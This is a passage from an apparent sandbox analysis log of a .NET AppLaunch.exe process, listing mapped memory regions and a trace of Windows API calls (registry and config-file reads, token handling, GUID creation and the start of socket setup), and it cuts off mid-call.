"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dynamic\\b7ad5353ae4f44df28ce7ebc9a8a752a\\system.dynamic.ni.dll") Region: id = 5068 start_va = 0x6c340000 end_va = 0x6c46ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll") Region: id = 5069 start_va = 0x743e0000 end_va = 0x743edfff monitored = 0 entry_point = 0x743e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 5070 start_va = 0x56e0000 end_va = 0x57dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 5071 start_va = 0x58f0000 end_va = 0x592ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058f0000" filename = "" Region: id = 5072 start_va = 0x5a90000 end_va = 0x5b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a90000" filename = "" Region: id = 5073 start_va = 0x6c310000 end_va = 0x6c330fff monitored = 1 entry_point = 0x6c3198e0 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wminet_utils.dll") Region: id = 5074 start_va = 0xfff34000 end_va = 0xfff36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff34000" filename = "" Region: id = 5075 start_va = 0x2c0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 5076 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 5077 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5078 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 5079 start_va = 0x6c2f0000 end_va = 0x6c309fff monitored = 0 entry_point = 0x6c3003d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 5080 start_va = 0x6c280000 end_va = 0x6c2e0fff monitored = 0 entry_point = 0x6c2bbf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\SysWOW64\\wbemcomn2.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn2.dll") Region: id = 5081 start_va = 0x6c270000 end_va = 0x6c27afff monitored = 0 entry_point = 0x6c2752a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5082 start_va = 0x6c260000 end_va = 0x6c26efff monitored = 0 entry_point = 0x6c2693d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5083 start_va = 0x6c1b0000 end_va = 0x6c255fff monitored = 0 entry_point = 0x6c21a2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5084 start_va = 0x6c190000 end_va = 0x6c1a7fff monitored = 0 entry_point = 0x6c191335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 5085 start_va = 0x440000 end_va = 0x442fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 5086 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5087 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5088 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5089 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 5090 start_va = 0x6f0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 5091 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 5092 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 5093 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 5094 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5095 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5096 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5097 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5098 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5099 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5100 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 5101 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5102 start_va = 0x4a0000 end_va = 0x4a2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 5103 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5104 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 5105 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5106 start_va = 0x6d0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 5107 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5108 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5109 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5110 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 5111 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 5112 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5113 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5114 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5115 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5116 start_va = 0x6c0b0000 end_va = 0x6c187fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Security\\93d03eb9812405fa70e89d4efd5f7e14\\System.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.security\\93d03eb9812405fa70e89d4efd5f7e14\\system.security.ni.dll") Region: id = 5117 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5118 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5119 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5120 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5121 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5122 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 5123 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5125 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5128 start_va = 0x5b90000 end_va = 0x6081fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b90000" filename = "" Region: id = 5129 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5130 start_va = 0x6090000 end_va = 0x6581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006090000" filename = "" Region: id = 5131 start_va = 0x6beb0000 end_va = 0x6bfaafff monitored = 0 entry_point = 0x6bec17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 5132 start_va = 0xd20000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 5133 start_va = 0xd60000 end_va = 0xd9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 5134 start_va = 0x6670000 end_va = 0x676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 5135 start_va = 0xfff31000 end_va = 0xfff33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff31000" filename = "" Thread: id = 159 os_tid = 0xfcc [0247.776] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0249.373] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x43e410 | out: phkResult=0x43e410*=0x0) returned 0x2 [0249.373] RegCloseKey (hKey=0x80000002) returned 0x0 [0249.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x43de68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0249.996] GetCurrentProcess () returned 0xffffffff [0249.997] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e1a0 | out: TokenHandle=0x43e1a0*=0x40) returned 1 [0250.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x43dc58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0250.004] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x43e198 | out: lpFileInformation=0x43e198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0250.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x43dc24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0250.006] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x43e1a0 | out: lpFileInformation=0x43e1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0250.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x43dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0250.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e0d8) returned 1 [0250.009] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1e4 [0250.009] GetFileType (hFile=0x1e4) returned 0x1 [0250.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e0d4) returned 1 [0250.010] GetFileType (hFile=0x1e4) returned 0x1 [0250.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x43d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0250.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x43d474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0250.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43d6b4) returned 1 [0250.028] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x43d978 | out: lpFileInformation=0x43d978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0250.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43d6b0) returned 1 [0250.180] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x43d844 | out: pfEnabled=0x43d844) returned 0x0 [0250.204] GetFileSize (in: hFile=0x1e4, lpFileSizeHigh=0x43e194 | out: lpFileSizeHigh=0x43e194*=0x0) returned 0x8c8e [0250.205] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e150, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43e150*=0x1000, lpOverlapped=0x0) returned 1 [0250.221] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e000, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43e000*=0x1000, lpOverlapped=0x0) returned 1 [0250.223] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43deb4, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43deb4*=0x1000, lpOverlapped=0x0) returned 1 [0250.224] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43deb4, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43deb4*=0x1000, lpOverlapped=0x0) returned 1 [0250.224] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43deb4, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43deb4*=0x1000, lpOverlapped=0x0) returned 1 [0250.225] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43ddec, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43ddec*=0x1000, lpOverlapped=0x0) returned 1 [0250.230] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43df58, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43df58*=0x1000, lpOverlapped=0x0) returned 1 [0250.232] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43de4c, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43de4c*=0x1000, lpOverlapped=0x0) returned 1 [0250.232] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43de4c, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43de4c*=0xc8e, lpOverlapped=0x0) returned 1 [0250.233] ReadFile (in: hFile=0x1e4, lpBuffer=0x25bbe6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43df10, lpOverlapped=0x0 | out: lpBuffer=0x25bbe6c*, lpNumberOfBytesRead=0x43df10*=0x0, lpOverlapped=0x0) returned 1 [0250.233] CloseHandle (hObject=0x1e4) returned 1 [0250.233] CloseHandle (hObject=0x40) returned 1 [0250.235] GetCurrentProcess () returned 0xffffffff [0250.236] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e2ec | out: TokenHandle=0x43e2ec*=0x40) returned 1 [0250.236] CloseHandle (hObject=0x40) returned 1 [0250.237] GetCurrentProcess () returned 0xffffffff [0250.237] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e2ec | out: TokenHandle=0x43e2ec*=0x40) returned 1 [0250.237] CloseHandle (hObject=0x40) returned 1 [0250.239] GetCurrentProcess () returned 0xffffffff [0250.239] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e1a0 | out: TokenHandle=0x43e1a0*=0x40) returned 1 [0250.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x43e198 | out: lpFileInformation=0x43e198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39c5900, ftCreationTime.dwHighDateTime=0x1cac64f, ftLastAccessTime.dwLowDateTime=0xf6bca250, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0xc39c5900, ftLastWriteTime.dwHighDateTime=0x1cac64f, nFileSizeHigh=0x0, nFileSizeLow=0x119)) returned 1 [0250.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x43dc24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0250.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x43e1a0 | out: lpFileInformation=0x43e1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39c5900, ftCreationTime.dwHighDateTime=0x1cac64f, ftLastAccessTime.dwLowDateTime=0xf6bca250, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0xc39c5900, ftLastWriteTime.dwHighDateTime=0x1cac64f, nFileSizeHigh=0x0, nFileSizeLow=0x119)) returned 1 [0250.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x43dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0250.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e0d8) returned 1 [0250.240] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1e4 [0250.240] GetFileType (hFile=0x1e4) returned 0x1 [0250.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e0d4) returned 1 [0250.240] GetFileType (hFile=0x1e4) returned 0x1 [0250.241] GetFileSize (in: hFile=0x1e4, lpFileSizeHigh=0x43e194 | out: lpFileSizeHigh=0x43e194*=0x0) returned 0x119 [0250.241] ReadFile (in: hFile=0x1e4, lpBuffer=0x25d4638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e150, lpOverlapped=0x0 | out: lpBuffer=0x25d4638*, lpNumberOfBytesRead=0x43e150*=0x119, lpOverlapped=0x0) returned 1 [0250.242] ReadFile (in: hFile=0x1e4, lpBuffer=0x25d4638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e014, lpOverlapped=0x0 | out: lpBuffer=0x25d4638*, lpNumberOfBytesRead=0x43e014*=0x0, lpOverlapped=0x0) returned 1 [0250.242] CloseHandle (hObject=0x1e4) returned 1 [0250.242] CloseHandle (hObject=0x40) returned 1 [0250.242] GetCurrentProcess () returned 0xffffffff [0250.242] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e2ec | out: TokenHandle=0x43e2ec*=0x40) returned 1 [0250.243] CloseHandle (hObject=0x40) returned 1 [0250.244] GetCurrentProcess () returned 0xffffffff [0250.244] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e2ec | out: TokenHandle=0x43e2ec*=0x40) returned 1 [0250.244] CloseHandle (hObject=0x40) returned 1 [0250.268] GetCurrentProcess () returned 0xffffffff [0250.268] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e104 | out: TokenHandle=0x43e104*=0x40) returned 1 [0250.276] CloseHandle (hObject=0x40) returned 1 [0250.277] GetCurrentProcess () returned 0xffffffff [0250.277] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e11c | out: TokenHandle=0x43e11c*=0x40) returned 1 [0250.278] CloseHandle (hObject=0x40) returned 1 [0250.310] GetCurrentProcess () returned 0xffffffff [0250.310] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43d920 | out: TokenHandle=0x43d920*=0x40) returned 1 [0250.328] CloseHandle (hObject=0x40) returned 1 [0250.328] GetCurrentProcess () returned 0xffffffff [0250.329] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43d938 | out: TokenHandle=0x43d938*=0x40) returned 1 [0250.362] CloseHandle (hObject=0x40) returned 1 [0250.733] GetCurrentProcess () returned 0xffffffff [0250.733] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e814 | out: TokenHandle=0x43e814*=0x40) returned 1 [0250.774] CloseHandle (hObject=0x40) returned 1 [0250.774] GetCurrentProcess () returned 0xffffffff [0250.774] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e82c | out: TokenHandle=0x43e82c*=0x40) returned 1 [0250.776] CloseHandle (hObject=0x40) returned 1 [0251.064] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x43e0a4 | out: phkResult=0x43e0a4*=0x0) returned 0x2 [0251.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x43e0a4 | out: phkResult=0x43e0a4*=0x0) returned 0x2 [0251.569] EtwEventRegister () returned 0x0 [0251.621] GetCurrentProcess () returned 0xffffffff [0251.621] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e82c | out: TokenHandle=0x43e82c*=0x1e4) returned 1 [0251.622] CloseHandle (hObject=0x1e4) returned 1 [0251.622] GetCurrentProcess () returned 0xffffffff [0251.622] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e844 | out: TokenHandle=0x43e844*=0x1e4) returned 1 [0251.624] CloseHandle (hObject=0x1e4) returned 1 [0251.679] EtwEventRegister () returned 0x0 [0251.700] EtwEventRegister () returned 0x0 [0251.746] CoCreateGuid (in: pguid=0x43e8f8 | out: pguid=0x43e8f8*(Data1=0xb88aa491, Data2=0x575d, Data3=0x4e43, Data4=([0]=0xb4, [1]=0xc, [2]=0xe7, [3]=0xe2, [4]=0x3a, [5]=0xcc, [6]=0x2, [7]=0xb0))) returned 0x0 [0251.747] CoCreateGuid (in: pguid=0x43e83c | out: pguid=0x43e83c*(Data1=0x696a898d, Data2=0x8d2, Data3=0x4d8d, Data4=([0]=0x9b, [1]=0xa9, [2]=0x14, [3]=0x61, [4]=0x54, [5]=0x75, [6]=0x79, [7]=0xb9))) returned 0x0 [0251.763] CoCreateGuid (in: pguid=0x43e6d4 | out: pguid=0x43e6d4*(Data1=0x63172504, Data2=0xe9a8, Data3=0x487d, Data4=([0]=0x8d, [1]=0x2c, [2]=0xa4, [3]=0xd2, [4]=0x82, [5]=0x78, [6]=0xc2, [7]=0x8c))) returned 0x0 [0251.809] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x43e358 | out: lpWSAData=0x43e358) returned 0 [0251.817] WSASocketW (af=2, type=2, 